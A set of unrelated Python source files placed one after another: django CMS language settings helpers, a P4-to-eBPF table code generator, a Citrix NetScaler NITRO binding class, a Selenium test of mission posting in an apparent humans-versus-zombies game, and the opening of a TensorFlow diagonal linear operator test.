"CMS_LANGUAGES has invalid key %r in language %r in site %r" % (key, language_code, site)
)
if 'fallbacks' not in language_object:
if default_fallbacks:
language_object['fallbacks'] = default_fallbacks
else:
needs_fallbacks.append((site, language_object))
for key in simple_defaults:
if key not in language_object:
language_object[key] = defaults[key]
site_fallbacks = {}
for site, language_object in needs_fallbacks:
if site not in site_fallbacks:
site_fallbacks[site] = [lang['code'] for lang in languages[site] if lang['public']]
language_object['fallbacks'] = [lang_code for lang_code in site_fallbacks[site] if
lang_code != language_object['code']]
languages['default'] = defaults
languages[VERIFIED] = True # this will be busted by @override_settings and cause a re-check
return languages
def get_languages():
if settings.SITE_ID != hash(settings.SITE_ID):
raise ImproperlyConfigured(
"SITE_ID must be an integer"
)
if not settings.USE_I18N:
return _ensure_languages_settings(
{settings.SITE_ID: [{'code': settings.LANGUAGE_CODE, 'name': settings.LANGUAGE_CODE}]})
if settings.LANGUAGE_CODE not in dict(settings.LANGUAGES):
raise ImproperlyConfigured(
'LANGUAGE_CODE "%s" must have a matching entry in LANGUAGES' % settings.LANGUAGE_CODE
)
languages = getattr(settings, 'CMS_LANGUAGES', {
settings.SITE_ID: [{'code': code, 'name': _(name)} for code, name in settings.LANGUAGES]
})
if VERIFIED in languages:
return languages
return _ensure_languages_settings(languages)
def get_unihandecode_host():
host = getattr(settings, 'CMS_UNIHANDECODE_HOST', None)
if not host:
return host
if host.endswith('/'):
return host
else:
return host + '/'
COMPLEX = {
'CACHE_DURATIONS': get_cache_durations,
'MEDIA_ROOT': get_media_root,
'MEDIA_URL': get_media_url,
# complex because not prefixed by CMS_
'TEMPLATES': get_templates,
'LANGUAGES': get_languages,
'UNIHANDECODE_HOST': get_unihandecode_host,
'CMS_TOOLBAR_URL__EDIT_ON': get_toolbar_url__edit_on,
'CMS_TOOLBAR_URL__EDIT_OFF': get_toolbar_url__edit_off,
'CMS_TOOLBAR_URL__BUILD': get_toolbar_url__build,
'CMS_TOOLBAR_URL__DISABLE': get_toolbar_url__disable,
}
DEPRECATED_CMS_SETTINGS = {
# Old CMS_WIZARD_* settings to be removed in v3.5.0
'PAGE_WIZARD_DEFAULT_TEMPLATE': 'WIZARD_DEFAULT_TEMPLATE',
'PAGE_WIZARD_CONTENT_PLUGIN': 'WIZARD_CONTENT_PLUGIN',
'PAGE_WIZARD_CONTENT_PLUGIN_BODY': 'WIZARD_CONTENT_PLUGIN_BODY',
'PAGE_WIZARD_CONTENT_PLACEHOLDER': 'WIZARD_CONTENT_PLACEHOLDER',
}
def get_cms_setting(name):
if name in COMPLEX:
return COMPLEX[name]()
elif name in DEPRECATED_CMS_SETTINGS:
new_setting = 'CMS_%s' % name
old_setting = 'CMS_%s' % DEPRECATED_CMS_SETTINGS[name]
return getattr(settings, new_setting, getattr(settings, old_setting, DEFAULTS[name]))
return getattr(settings, 'CMS_%s' % name, DEFAULTS[name])
def get_site_id(site):
from django.contrib.sites.models import Site
if isinstance(site, Site):
return site.id
try:
return int(site)
except (TypeError, ValueError):
pass
return settings.SITE_ID
|
|
# Copyright (c) Barefoot Networks, Inc.
# Licensed under the Apache License, Version 2.0 (the "License")
from p4_hlir.hlir import p4_match_type, p4_field, p4_table, p4_header_instance
from programSerializer import ProgramSerializer
from compilationException import *
import ebpfProgram
import ebpfInstance
import ebpfCounter
import ebpfStructType
import ebpfAction
class EbpfTableKeyField(object):
def __init__(self, fieldname, instance, field, mask):
assert isinstance(instance, ebpfInstance.EbpfInstanceBase)
assert isinstance(field, ebpfStructType.EbpfField)
self.keyFieldName = fieldname
self.instance = instance
self.field = field
self.mask = mask
def serializeType(self, serializer):
assert isinstance(serializer, ProgramSerializer)
ftype = self.field.type
serializer.emitIndent()
ftype.declare(serializer, self.keyFieldName, False)
serializer.endOfStatement(True)
def serializeConstruction(self, keyName, serializer, program):
assert isinstance(serializer, ProgramSerializer)
assert isinstance(keyName, str)
assert isinstance(program, ebpfProgram.EbpfProgram)
if self.mask is not None:
maskExpression = " & {0}".format(self.mask)
else:
maskExpression = ""
if isinstance(self.instance, ebpfInstance.EbpfMetadata):
base = program.metadataStructName
else:
base = program.headerStructName
if isinstance(self.instance, ebpfInstance.SimpleInstance):
source = "{0}.{1}.{2}".format(
base, self.instance.name, self.field.name)
else:
assert isinstance(self.instance, ebpfInstance.EbpfHeaderStack)
source = "{0}.{1}[{2}].{3}".format(
base, self.instance.name,
self.instance.hlirInstance.index, self.field.name)
destination = "{0}.{1}".format(keyName, self.keyFieldName)
size = self.field.widthInBits()
serializer.emitIndent()
if size <= 32:
serializer.appendFormat("{0} = ({1}){2};",
destination, source, maskExpression)
else:
if maskExpression != "":
raise NotSupportedException(
"{0} Mask wider than 32 bits", self.field.hlirType)
serializer.appendFormat(
"memcpy(&{0}, &{1}, {2});", destination, source, size / 8)
serializer.newline()
class EbpfTableKey(object):
def __init__(self, match_fields, program):
assert isinstance(program, ebpfProgram.EbpfProgram)
self.expressions = []
self.fields = []
self.masks = []
self.fieldNamePrefix = "key_field_"
self.program = program
fieldNumber = 0
for f in match_fields:
field = f[0]
matchType = f[1]
mask = f[2]
if ((matchType is p4_match_type.P4_MATCH_TERNARY) or
(matchType is p4_match_type.P4_MATCH_LPM) or
(matchType is p4_match_type.P4_MATCH_RANGE)):
raise NotSupportedException(
False, "Match type {0}", matchType)
if matchType is p4_match_type.P4_MATCH_VALID:
# we should be really checking the valid field;
# p4_field is a header instance
assert isinstance(field, p4_header_instance)
instance = field
fieldname = "valid"
else:
assert isinstance(field, p4_field)
instance = field.instance
fieldname = field.name
if ebpfProgram.EbpfProgram.isArrayElementInstance(instance):
ebpfStack = program.getStackInstance(instance.base_name)
assert isinstance(ebpfStack, ebpfInstance.EbpfHeaderStack)
basetype = ebpfStack.basetype
eInstance = program.getStackInstance(instance.base_name)
else:
ebpfHeader = program.getInstance(instance.name)
assert isinstance(ebpfHeader, ebpfInstance.SimpleInstance)
basetype = ebpfHeader.type
eInstance = program.getInstance(instance.name)
ebpfField = basetype.getField(fieldname)
assert isinstance(ebpfField, ebpfStructType.EbpfField)
fieldName = self.fieldNamePrefix + str(fieldNumber)
fieldNumber += 1
keyField = EbpfTableKeyField(fieldName, eInstance, ebpfField, mask)
self.fields.append(keyField)
self.masks.append(mask)
@staticmethod
def fieldRank(field):
assert isinstance(field, EbpfTableKeyField)
return field.field.type.alignment()
def serializeType(self, serializer, keyTypeName):
assert isinstance(serializer, ProgramSerializer)
serializer.emitIndent()
serializer.appendFormat("struct {0} ", keyTypeName)
serializer.blockStart()
# Sort fields in decreasing size; this will ensure that
# there is no padding.
# Padding may cause the ebpf verification to fail,
# since padding fields are not initialized
fieldOrder = sorted(
self.fields, key=EbpfTableKey.fieldRank, reverse=True)
for f in fieldOrder:
assert isinstance(f, EbpfTableKeyField)
f.serializeType(serializer)
serializer.blockEnd(False)
serializer.endOfStatement(True)
def serializeConstruction(self, serializer, keyName, program):
serializer.emitIndent()
serializer.appendLine("/* construct key */")
for f in self.fields:
f.serializeConstruction(keyName, serializer, program)
class EbpfTable(object):
# noinspection PyUnresolvedReferences
def __init__(self, hlirtable, program, config):
assert isinstance(hlirtable, p4_table)
assert isinstance(program, ebpfProgram.EbpfProgram)
self.name = hlirtable.name
self.hlirtable = hlirtable
self.config = config
self.defaultActionMapName = (program.reservedPrefix +
self.name + "_miss")
self.key = EbpfTableKey(hlirtable.match_fields, program)
self.size = hlirtable.max_size
if self.size is None:
program.emitWarning(
"{0} does not specify a max_size; using 1024", hlirtable)
self.size = 1024
self.isHash = True # TODO: try to guess arrays when possible
self.dataMapName = self.name
self.actionEnumName = program.generateNewName(self.name + "_actions")
self.keyTypeName = program.generateNewName(self.name + "_key")
self.valueTypeName = program.generateNewName(self.name + "_value")
self.actions = []
if hlirtable.action_profile is not None:
raise NotSupportedException("{0}: action_profile tables",
hlirtable)
if hlirtable.support_timeout:
program.emitWarning("{0}: table timeout {1}; ignoring",
hlirtable, NotSupportedException.archError)
self.counters = []
if (hlirtable.attached_counters is not None):
for c in hlirtable.attached_counters:
ctr = program.getCounter(c.name)
assert isinstance(ctr, ebpfCounter.EbpfCounter)
self.counters.append(ctr)
if (len(hlirtable.attached_meters) > 0 or
len(hlirtable.attached_registers) > 0):
program.emitWarning("{0}: meters/registers {1}; ignored",
hlirtable, NotSupportedException.archError)
for a in hlirtable.actions:
action = program.getAction(a)
self.actions.append(action)
def serializeKeyType(self, serializer):
assert isinstance(serializer, ProgramSerializer)
self.key.serializeType(serializer, self.keyTypeName)
def serializeActionArguments(self, serializer, action):
assert isinstance(serializer, ProgramSerializer)
assert isinstance(action, ebpfAction.EbpfActionBase)
action.serializeArgumentsAsStruct(serializer)
def serializeValueType(self, serializer):
assert isinstance(serializer, ProgramSerializer)
# create an enum with tags for all actions
serializer.emitIndent()
serializer.appendFormat("enum {0} ", self.actionEnumName)
serializer.blockStart()
for a in self.actions:
name = a.name
serializer.emitIndent()
serializer.appendFormat("{0}_{1},", self.name, name)
serializer.newline()
serializer.blockEnd(False)
serializer.endOfStatement(True)
# a type-safe union: a struct with a tag and an union
serializer.emitIndent()
serializer.appendFormat("struct {0} ", self.valueTypeName)
serializer.blockStart()
serializer.emitIndent()
#serializer.appendFormat("enum {0} action;", self.actionEnumName)
# teporary workaround bcc bug
serializer.appendFormat("{0}32 action;",
self.config.uprefix)
serializer.newline()
serializer.emitIndent()
serializer.append("union ")
serializer.blockStart()
for a in self.actions:
self.serializeActionArguments(serializer, a)
serializer.blockEnd(False)
serializer.space()
serializer.appendLine("u;")
serializer.blockEnd(False)
serializer.endOfStatement(True)
def serialize(self, serializer, program):
assert isinstance(serializer, ProgramSerializer)
assert isinstance(program, ebpfProgram.EbpfProgram)
self.serializeKeyType(serializer)
self.serializeValueType(serializer)
self.config.serializeTableDeclaration(
serializer, self.dataMapName, self.isHash,
"struct " + self.keyTypeName,
"struct " + self.valueTypeName, self.size)
self.config.serializeTableDeclaration(
serializer, self.defaultActionMapName, False,
program.arrayIndexType, "struct " + self.valueTypeName, 1)
def serializeCode(self, serializer, program, nextNode):
assert isinstance(serializer, ProgramSerializer)
assert isinstance(program, ebpfProgram.EbpfProgram)
hitVarName = program.reservedPrefix + "hit"
keyname = "key"
valueName = "value"
serializer.newline()
serializer.emitIndent()
serializer.appendFormat("{0}:", program.getLabel(self))
serializer.newline()
serializer.emitIndent()
serializer.blockStart()
serializer.emitIndent()
serializer.appendFormat("{0}8 {1};", program.config.uprefix, hitVarName)
serializer.newline()
serializer.emitIndent()
serializer.appendFormat("struct {0} {1} = {{}};", self.keyTypeName, keyname)
serializer.newline()
serializer.emitIndent()
serializer.appendFormat(
"struct {0} *{1};", self.valueTypeName, valueName)
serializer.newline()
self.key.serializeConstruction(serializer, keyname, program)
serializer.emitIndent()
serializer.appendFormat("{0} = 1;", hitVarName)
serializer.newline()
serializer.emitIndent()
serializer.appendLine("/* perform lookup */")
serializer.emitIndent()
program.config.serializeLookup(
serializer, self.dataMapName, keyname, valueName)
serializer.newline()
serializer.emitIndent()
serializer.appendFormat("if ({0} == NULL) ", valueName)
serializer.blockStart()
serializer.emitIndent()
serializer.appendFormat("{0} = 0;", hitVarName)
serializer.newline()
serializer.emitIndent()
serializer.appendLine("/* miss; find default action */")
serializer.emitIndent()
program.config.serializeLookup(
serializer, self.defaultActionMapName,
program.zeroKeyName, valueName)
serializer.newline()
serializer.blockEnd(True)
if len(self.counters) > 0:
serializer.emitIndent()
serializer.append("else ")
serializer.blockStart()
for c in self.counters:
assert isinstance(c, ebpfCounter.EbpfCounter)
if c.autoIncrement:
serializer.emitIndent()
serializer.blockStart()
c.serializeCode(keyname, serializer, program)
serializer.blockEnd(True)
serializer.blockEnd(True)
serializer.emitIndent()
serializer.appendFormat("if ({0} != NULL) ", valueName)
serializer.blockStart()
serializer.emitIndent()
serializer.appendLine("/* run action */")
self.runAction(serializer, self.name, valueName, program, nextNode)
nextNode = self.hlirtable.next_
if "hit" in nextNode:
node = nextNode["hit"]
if node is None:
node = nextNode
label = program.getLabel(node)
serializer.emitIndent()
serializer.appendFormat("if (hit) goto {0};", label)
serializer.newline()
node = nextNode["miss"]
if node is None:
node = nextNode
label = program.getLabel(node)
serializer.emitIndent()
serializer.appendFormat("else goto {0};", label)
serializer.newline()
serializer.blockEnd(True)
if not "hit" in nextNode:
# Catch-all
serializer.emitIndent()
serializer.appendFormat("goto end;")
serializer.newline()
serializer.blockEnd(True)
def runAction(self, serializer, tableName, valueName, program, nextNode):
serializer.emitIndent()
serializer.appendFormat("switch ({0}->action) ", valueName)
serializer.blockStart()
for a in self.actions:
assert isinstance(a, ebpfAction.EbpfActionBase)
serializer.emitIndent()
serializer.appendFormat("case {0}_{1}: ", tableName, a.name)
serializer.newline()
serializer.emitIndent()
serializer.blockStart()
a.serializeBody(serializer, valueName, program)
serializer.blockEnd(True)
serializer.emitIndent()
nextNodes = self.hlirtable.next_
if a.hliraction in nextNodes:
node = nextNodes[a.hliraction]
if node is None:
node = nextNode
label = program.getLabel(node)
serializer.appendFormat("goto {0};", label)
else:
serializer.appendFormat("break;")
serializer.newline()
serializer.blockEnd(True)
|
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class aaagroup_auditsyslogpolicy_binding(base_resource) :
""" Binding class showing the auditsyslogpolicy that can be bound to aaagroup.
"""
def __init__(self) :
self._policy = ""
self._priority = 0
self._acttype = 0
self._groupname = ""
self.___count = 0
@property
def priority(self) :
ur"""Priority to assign to the policy, as an integer. A lower number indicates a higher priority.
Required when binding a group to a policy. Not relevant to any other
type of group binding.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
ur"""Priority to assign to the policy, as an integer. A lower number indicates a higher priority.
Required when binding a group to a policy. Not relevant to any other
type of group binding.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def policy(self) :
ur"""The policy name.
"""
try :
return self._policy
except Exception as e:
raise e
@policy.setter
def policy(self, policy) :
ur"""The policy name.
"""
try :
self._policy = policy
except Exception as e:
raise e
@property
def groupname(self) :
ur"""Name of the group that you are binding.<br/>Minimum length = 1.
"""
try :
return self._groupname
except Exception as e:
raise e
@groupname.setter
def groupname(self, groupname) :
ur"""Name of the group that you are binding.<br/>Minimum length = 1
"""
try :
self._groupname = groupname
except Exception as e:
raise e
@property
def acttype(self) :
try :
return self._acttype
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(aaagroup_auditsyslogpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.aaagroup_auditsyslogpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
if self.groupname is not None :
return str(self.groupname)
return None
except Exception as e :
raise e
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = aaagroup_auditsyslogpolicy_binding()
updateresource.groupname = resource.groupname
updateresource.policy = resource.policy
updateresource.priority = resource.priority
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [aaagroup_auditsyslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i].groupname = resource[i].groupname
updateresources[i].policy = resource[i].policy
updateresources[i].priority = resource[i].priority
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = aaagroup_auditsyslogpolicy_binding()
deleteresource.groupname = resource.groupname
deleteresource.policy = resource.policy
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [aaagroup_auditsyslogpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i].groupname = resource[i].groupname
deleteresources[i].policy = resource[i].policy
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, groupname) :
ur""" Use this API to fetch aaagroup_auditsyslogpolicy_binding resources.
"""
try :
obj = aaagroup_auditsyslogpolicy_binding()
obj.groupname = groupname
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, groupname, filter_) :
ur""" Use this API to fetch filtered set of aaagroup_auditsyslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = aaagroup_auditsyslogpolicy_binding()
obj.groupname = groupname
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, groupname) :
ur""" Use this API to count aaagroup_auditsyslogpolicy_binding resources configued on NetScaler.
"""
try :
obj = aaagroup_auditsyslogpolicy_binding()
obj.groupname = groupname
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, groupname, filter_) :
ur""" Use this API to count the filtered set of aaagroup_auditsyslogpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = aaagroup_auditsyslogpolicy_binding()
obj.groupname = groupname
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class aaagroup_auditsyslogpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.aaagroup_auditsyslogpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.aaagroup_auditsyslogpolicy_binding = [aaagroup_auditsyslogpolicy_binding() for _ in range(length)]
|
|
#!/usr/bin/python
#
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TODO: High-level file comment."""
import sys
import time
def main(argv):
pass
if __name__ == '__main__':
main(sys.argv)
import setup
from selenium.webdriver.common.by import By
def insertAndVerifyMissionInfo(
name,
startYear,
startMonth,
startDay,
startTime,
endYear,
endMonth,
endDay,
endTime,
details,
groupName):
driver.SendKeys([[By.ID, 'form-section-mission-name'],[By.TAG_NAME, 'input']], name) #TODO(aliengirl): Figure out why occasionally it says this element doesn't exist
driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'year'],[By.TAG_NAME, 'input']], 4)
driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'year'],[By.TAG_NAME, 'input']], startYear)
driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'month'],[By.TAG_NAME, 'input']])
driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'month'],[By.TAG_NAME, 'input']], startMonth)
driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'day'],[By.TAG_NAME, 'input']], 2)
driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'day'],[By.TAG_NAME, 'input']], startDay)
driver.Backspace([[By.ID, 'form-section-mission-begin'],[By.ID, 'time'],[By.TAG_NAME, 'input']], 7)
driver.SendKeys([[By.ID, 'form-section-mission-begin'],[By.ID, 'time'],[By.TAG_NAME, 'input']], startTime)
driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'year'],[By.TAG_NAME, 'input']], 4)
driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'year'],[By.TAG_NAME, 'input']], endYear)
driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'month'],[By.TAG_NAME, 'input']])
driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'month'],[By.TAG_NAME, 'input']], endMonth)
driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'day'],[By.TAG_NAME, 'input']], 2)
driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'day'],[By.TAG_NAME, 'input']], endDay)
driver.Backspace([[By.ID, 'form-section-mission-end'],[By.ID, 'time'],[By.TAG_NAME, 'input']], 7)
driver.SendKeys([[By.ID, 'form-section-mission-end'],[By.ID, 'time'],[By.TAG_NAME, 'input']], endTime)
driver.SendKeys([[By.ID, 'form-section-mission-details'],[By.TAG_NAME, 'textarea']], details)
driver.Click([[By.ID, 'missionForm'], [By.ID, 'form-section-mission-group'], [By.ID, 'name']])
driver.Click([[By.ID, 'missionForm'], [By.ID, 'form-section-mission-group'], [By.NAME, 'group-name-' + groupName]])
driver.Click([[By.ID, 'missionForm'], [By.NAME, 'form-buttons-Mission'], [By.ID, 'done']])
# Verify the mission shows up in the admin's list of missions
driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionName']], name)
driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionGroup']], groupName)
driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionStart']], startTime)
driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionEnd']], endTime)
driver.ExpectContains([[By.NAME, 'mission-row-%s' % name], [By.NAME, 'missionDetails']], details[0:10])
driver = setup.MakeDriver(user="zella")
driver.DrawerMenuClick('Admin Missions')
driver.Click([[By.NAME, 'close-notification']])
# Delete the two missions which start out there
driver.TableMenuClick([[By.NAME, "mission-row-first zed mission!"]], 'Delete')
# TODO(verdagon): take this back out, was added in because of a weird menu issue that deleted both the missions
# New finding: i once saw it accidentally hit the first human mission (the first row) instead of the first zed
# mission (the second row) and then i think delete them both with one tap.
time.sleep(2)
driver.TableMenuClick([[By.NAME, "mission-row-first human mission!"]], 'Delete')
# Make sure both humans and zombies get a default message when no missions are posted.
driver.DrawerMenuClick('Dashboard')
driver.ExpectContains([[By.NAME, 'next-mission-box']], "The next mission's details will be posted here.")
driver.SwitchUser('zeke') # He's a zombie
driver.ExpectContains([[By.NAME, 'next-mission-box']], "The next mission's details will be posted here.")
# Log back in as an admin.
driver.SwitchUser('zella')
driver.DrawerMenuClick('Admin Missions')
# Create a human mission
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
name='insert witty and entertaining name here',
startYear='2017',
startMonth='10',
startDay='20',
startTime='3:00am',
endYear='2038',
endMonth='4',
endDay='2',
endTime='10:15pm',
details='<div>take over the world</div>',
groupName='Resistance')
# Create a zombie mission
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
name='zed mission',
startYear='2017',
startMonth='1',
startDay='2',
startTime='12:34am',
endYear='2038',
endMonth='4',
endDay='2',
endTime='2:34pm',
details='<div>eat humans</div>',
groupName='Horde')
# Log in as a human (Jack), make sure he can see the human mission but not the zombie mission
driver.SwitchUser('jack')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world')
driver.ExpectContains([[By.NAME, 'next-mission-box']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'next-mission-box']], "Apr 2 10:15pm") # end time
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'eat humans', should_exist=False)
# Find the mission in the drawer as well
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-insert witty and entertaining name here']], "take over the world")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Apr 2 10:15pm") # end time
# Log in as a zombie (Zeke), make sure he can see the zombie mission but not the human mission
driver.SwitchUser('zeke')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'eat humans')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world', should_exist=False)
# Find the missions in the drawer as well
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-zed mission']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-zed mission']], "eat humans")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-zed mission']], "Jan 2 12:34am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-zed mission']], "Apr 2 2:34pm") # end time
# As an admin, create another human mission
driver.SwitchUser('zella')
driver.Click([[By.ID, 'add']])
insertAndVerifyMissionInfo(
name='Defeat the dread zombie boss Gnashable the Zeebweeble',
startYear='2017',
startMonth='9',
startDay='20',
startTime='3:00am',
endYear='2037',
endMonth='4',
endDay='2',
endTime='10:15pm',
details='<div>Basically, we just run around in circles trying not to die.</div>',
groupName='Everyone')
driver.SwitchUser('jack')
driver.DrawerMenuClick('Dashboard')
# On the dashboard the new mission shows up (since the end date is sooner than the other one)
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'Basically, we just run around in circles trying not to die.')
# On the missions page, both should show up
driver.DrawerMenuClick('Missions')
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-Defeat the dread zombie boss Gnashable the Zeebweeble']])
# As an admin, change the mission end date to later than the other human mission
driver.SwitchUser('zella')
driver.DrawerMenuClick('Admin Missions')
driver.TableMenuClick([[By.NAME, 'mission-row-Defeat the dread zombie boss Gnashable the Zeebweeble']], 'Edit')
insertAndVerifyMissionInfo(
name='Defeat the super scary awful zombie boss Gnashable the Zeebweeble',
startYear='2018',
startMonth='10',
startDay='21',
startTime='12:34pm',
endYear='2039',
endMonth='5',
endDay='3',
endTime='11:16pm',
details='<div>Basically, we just run around in ellipses trying not to die.</div>',
groupName='Everyone')
# Log in as a human (Jack). Show that the new mission doesn't show up anymore
driver.SwitchUser('jack')
driver.DrawerMenuClick('Dashboard')
driver.ExpectContains([[By.NAME, 'next-mission-box']], 'take over the world')
driver.DrawerMenuClick('Missions')
# On the missions page, both should show up
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-insert witty and entertaining name here']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-insert witty and entertaining name here']], "take over the world")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Oct 20 3:00am") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-insert witty and entertaining name here']], "Apr 2 10:15pm") # end time
driver.FindElement([[By.NAME, 'missions-card'], [By.NAME, 'mission-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']])
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-text-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "Basically, we just run around in ellipses trying not to die.")
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "Oct 21 12:34pm") # start time
driver.ExpectContains([[By.NAME, 'missions-card'], [By.NAME, 'mission-controls-Defeat the super scary awful zombie boss Gnashable the Zeebweeble']], "May 3 11:16pm") # end time
driver.Quit()
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import linalg_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops.linalg import linalg as linalg_lib
from tensorflow.python.ops.linalg import linear_operator_test_util
from tensorflow.python.platform import test
linalg = linalg_lib
class LinearOperatorDiagTest(
linear_operator_test_util.SquareLinearOperatorDerivedClassTest):
"""Most tests done in the base class LinearOperatorDerivedClassTest."""
def operator_and_matrix(
self, build_info, dtype, use_placeholder,
ensure_self_adjoint_and_pd=False):
shape = list(build_info.shape)
diag = linear_operator_test_util.random_sign_uniform(
shape[:-1], minval=1., maxval=2., dtype=dtype)
if ensure_self_adjoint_and_pd:
# Abs on complex64 will result in a float32, so we cast back up.
diag = math_ops.cast(math_ops.abs(diag), dtype=dtype)
lin_op_diag = diag
if use_placeholder:
lin_op_diag = array_ops.placeholder_with_default(diag, shape=None)
operator = linalg.LinearOperatorDiag(
lin_op_diag,
